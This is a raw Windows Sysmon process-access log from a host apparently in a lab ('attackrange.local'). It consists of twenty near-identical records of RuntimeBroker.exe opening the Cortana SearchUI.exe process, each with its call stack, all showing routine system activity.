13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
